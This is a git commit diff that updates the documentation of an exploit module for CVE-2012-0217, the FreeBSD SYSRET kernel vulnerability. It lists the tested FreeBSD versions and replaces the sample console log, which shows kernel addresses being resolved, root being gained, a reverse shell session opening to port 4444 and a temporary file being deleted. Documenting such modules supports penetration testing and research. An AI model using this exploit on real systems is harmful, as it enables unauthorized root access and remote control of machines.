Update documentation
Brendan Coles
parent
e4fc4e654d
commit
1cf5c79cc8
|
|
@ -1,7 +1,7 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64)
|
||||
kernel, when running on 64-bit Intel processors.
|
||||
This module exploits a vulnerability in the FreeBSD kernel,
|
||||
when running on 64-bit Intel processors.
|
||||
|
||||
By design, 64-bit processors following the X86-64 specification will
|
||||
trigger a general protection fault (GPF) when executing a SYSRET
|
||||
|
|
@ -15,7 +15,10 @@
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been tested successfully on FreeBSD 9.0-RELEASE.
|
||||
This module has been tested successfully on:
|
||||
|
||||
* FreeBSD 8.3-RELEASE (amd64)
|
||||
* FreeBSD 9.0-RELEASE (amd64)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
|
@ -64,12 +67,31 @@
|
|||
[*] Max line length is 131073
|
||||
[*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
|
||||
[*] Launching exploit...
|
||||
[*] [+] SYSRET FUCKUP!!
|
||||
[*] [+] Start Engine...
|
||||
[*] [+] Crotz...
|
||||
[*] [+] Crotz...
|
||||
[*] [+] Crotz...
|
||||
[*] [+] Woohoo!!!
|
||||
[*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
|
||||
[*]
|
||||
[*] [*] Retrieving host information...
|
||||
[*] [+] CPU: GenuineIntel
|
||||
[*] [+] sysname: FreeBSD
|
||||
[*] [+] release: 9.0-RELEASE
|
||||
[*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
|
||||
[*] [+] machine: amd64
|
||||
[*] [*] Validating target OS and version...
|
||||
[*] [+] Vulnerable :-)
|
||||
[*] [*] Resolving kernel addresses...
|
||||
[*] [+] Resolved Xofl to 0xffffffff80b02e70
|
||||
[*] [+] Resolved Xbnd to 0xffffffff80b02ea0
|
||||
[*] [+] Resolved Xill to 0xffffffff80b02ed0
|
||||
[*] [+] Resolved Xdna to 0xffffffff80b02f00
|
||||
[*] [+] Resolved Xpage to 0xffffffff80b03240
|
||||
[*] [+] Resolved Xfpu to 0xffffffff80b02fc0
|
||||
[*] [+] Resolved Xalign to 0xffffffff80b03080
|
||||
[*] [+] Resolved Xmchk to 0xffffffff80b02f60
|
||||
[*] [+] Resolved Xxmm to 0xffffffff80b02ff0
|
||||
[*] [*] Setup...
|
||||
[*] [+] Trigger code...
|
||||
[*] [+] Trampoline code...
|
||||
[*] [*] Fire in the hole!
|
||||
[*] [*] Got root!
|
||||
[+] Success! Executing payload...
|
||||
[*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
|
||||
[+] Deleted /tmp/.mTaR4rAPd.c
|
||||
|
|
|
|||
Loading…
Reference in New Issue